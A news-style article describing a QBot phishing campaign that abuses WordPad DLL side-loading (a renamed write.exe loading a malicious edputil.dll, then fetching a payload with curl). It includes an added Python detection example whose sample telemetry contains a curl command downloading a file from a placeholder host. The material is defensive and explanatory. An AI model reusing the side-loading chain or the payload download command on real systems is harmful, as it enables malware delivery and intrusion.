A new malicious campaign by the QBot malware operators uses a DLL hijacking vulnerability in the Windows WordPad utility to bypass security detections. Abusing legitimate Windows programs and utility tools is becoming a standard malware distribution technique for threat actors.
Based on reports, the new QBot phishing attack leverages a flaw in the WordPad executable, write[.]exe. The operation begins with phishing emails that deceive targets into downloading a file from an attached link. Once a user clicks the link, the site serves a randomly named ZIP file from a remote server.
Researchers stated that the ZIP archive contains two files: a Windows executable called document[.]exe and a DLL file called edputil[.]dll. The executable, document[.]exe, is a renamed copy of the legitimate Write[.]exe file.
The new QBot malware campaign could execute its attacks quickly.
An analysis of the attack explained that QBot can infect a target quickly once a user runs the document[.]exe file described above.
When the executable starts, it attempts to load edputil[.]dll, checking its own folder for the file. The attackers place a malicious edputil[.]dll in that same folder so that it is loaded in place of the legitimate one.
The process then loads WinWord with the malicious DLL. Once the DLL is loaded, it uses curl[.]exe to download another DLL, disguised as a PNG file, and this final DLL launches the QBot malware.
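As an added defender-side example (not code from the article or its sources), the following Python sketch correlates Sysmon-style image-load and process-create events to spot the chain above: a renamed write[.]exe loading edputil[.]dll from its own folder and then spawning curl[.]exe. Field names follow Sysmon's schema; the events themselves are constructed sample data.

```python
"""Added detection example, not from the original article: correlate two
Sysmon-style events (EventID 7 = image load, EventID 1 = process create) to
find a host that loaded edputil.dll from outside the system folders and then
spawned curl.exe. All sample events below are constructed, not real logs."""
import ntpath

SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def is_sideloaded_edputil(event: dict) -> bool:
    """Image-load event where edputil.dll is loaded from a non-system folder.
    The legitimate DLL lives under the Windows system directories; a copy
    next to the renamed write.exe (document.exe) is the side-load."""
    if event.get("EventID") != 7:
        return False
    loaded = event.get("ImageLoaded", "")
    if ntpath.basename(loaded).lower() != "edputil.dll":
        return False
    return ntpath.dirname(loaded).lower() not in SYSTEM_DIRS


def find_sideload_chain(events: list) -> list:
    """(parent ProcessGuid, command line) for each curl.exe started by a
    process that side-loaded edputil.dll. Correlating on ProcessGuid instead
    of the image name survives the document.exe rename."""
    sideloaders = {e["ProcessGuid"] for e in events if is_sideloaded_edputil(e)}
    hits = []
    for e in events:
        if e.get("EventID") != 1 or e.get("ParentProcessGuid") not in sideloaders:
            continue
        if ntpath.basename(e.get("Image", "")).lower() == "curl.exe":
            hits.append((e["ParentProcessGuid"], e.get("CommandLine", "")))
    return hits


# Constructed sample telemetry; GUIDs, paths and the URL are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 7, "ProcessGuid": "{GUID-A}",
     "Image": r"C:\Users\victim\Downloads\unzipped\document.exe",
     "ImageLoaded": r"C:\Users\victim\Downloads\unzipped\edputil.dll"},
    {"EventID": 7, "ProcessGuid": "{GUID-B}",  # benign: real WordPad, real DLL
     "Image": r"C:\Windows\System32\write.exe",
     "ImageLoaded": r"C:\Windows\System32\edputil.dll"},
    {"EventID": 1, "ProcessGuid": "{GUID-C}", "ParentProcessGuid": "{GUID-A}",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -o %TEMP%\img.png hxxp://placeholder[.]invalid/img.png"},
    {"EventID": 1, "ProcessGuid": "{GUID-D}", "ParentProcessGuid": "{GUID-B}",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]
```

Running `find_sideload_chain(SAMPLE_EVENTS)` returns only the `{GUID-A}` host, because the benign WordPad process loaded its DLL from System32 and spawned nothing suspicious.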
QBot can then steal emails for use in further phishing campaigns and download additional payloads, such as Cobalt Strike, to gain initial access to the targeted system. The compromised system could also suffer further infection, since the malware can spread laterally across an entire network. Such access often results in corporate data theft and ransomware infections.
QBot's operators have always been quick to change their attack strategies. Organisations should therefore be wary of these threats, since QBot can now abuse legitimate Windows programs and move laterally across different infrastructures.